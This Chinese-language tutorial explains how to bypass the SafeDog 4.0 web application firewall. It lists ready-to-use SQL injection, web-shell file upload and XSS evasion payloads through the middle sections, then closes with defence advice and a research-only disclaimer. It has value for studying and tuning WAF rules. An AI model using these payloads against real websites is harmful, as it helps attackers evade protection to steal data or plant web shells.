安全狗4.0绕过
字数 783 2025-08-06 18:07:51
安全狗4.0绕过技术分析与实战教学
一、安全狗4.0防护概述
安全狗4.0是一款常见的Web应用防火墙(WAF),主要防护以下攻击类型:
- SQL注入
- XSS跨站脚本
- 文件上传漏洞
- 命令注入
- 目录遍历
- 其他常见Web攻击
二、绕过技术核心思路
1. 混淆技术
- 注释干扰:使用
/**/、--、#等注释符号分割敏感关键词 - 大小写混合:如
SeLeCt代替select - 空白字符填充:利用制表符、换行符等特殊空白字符
- 等价函数替换:使用功能相同但字符不同的函数
2. 编码技术
- URL编码:对关键字符进行部分或全部编码
- 十六进制编码:如
0x61646d696e代替'admin' - Unicode编码:使用非常规字符表示
- 双重/多重编码:对已编码内容再次编码
3. 协议层面绕过
- HTTP参数污染:同一参数多次出现不同值
- HTTP方法切换:GET/POST/HEAD等方法交替使用
- Content-Type变异:修改请求内容类型
三、SQL注入绕过实战
1. 基础绕过示例
原始语句:union select 1,2,3
绕过方式:uni/**/on sel/**/ect 1,2,3
2. 高级绕过技术
1. 大小写混合+注释:uNiOn SeLeCt 1,2,3--
2. 内联注释:/*!50000union*/ select 1,2,3
3. 空白字符:union%09select%0a1,2,3
4. 多重编码:%75%6e%69%6f%6e %73%65%6c%65%63%74 1,2,3
3. 函数绕过技巧
原始:substring(database(),1,1)
绕过:
1. substr(database() from 1 for 1)
2. mid(database(),1,1)
3. right(left(database(),1),1)
四、文件上传绕过
1. 文件类型绕过
1. 修改Content-Type: image/jpg
2. 文件头添加GIF89a
3. 双扩展名:shell.php.jpg
2. 文件名混淆
1. 大小写:sHell.PhP
2. 特殊字符:shell.p hp
3. 空字节:shell.php%00.jpg
3. 数据包分割
使用分块传输编码(Transfer-Encoding: chunked)
五、XSS绕过技术
1. 标签事件绕过
原始:<script>alert(1)</script>
绕过:
1.
2. <svg/onload=alert(1)>
3. <a href="javascript:alert(1)">click</a>
2. 编码混淆
1. HTML实体编码:alert(1)
2. JS编码:\u0061\u006c\u0065\u0072\u0074(1)
六、实战注意事项
- 渐进式测试:从简单绕过开始,逐步增加复杂度
- 多维度组合:同时使用多种绕过技术
- 环境差异:不同版本/配置的安全狗可能有不同防护规则
- 日志监控:注意观察WAF拦截日志,分析防护规则
七、防御建议
- 使用最新版本安全狗并保持规则更新
- 配置多层级防御策略
- 对输入输出进行严格过滤和编码
- 实施最小权限原则
- 定期进行安全测试和规则调优
八、参考资料
- 安全狗官方文档
- OWASP WAF绕过技术指南
- 实际渗透测试经验总结
注:本文仅用于安全研究和技术交流,请勿用于非法用途。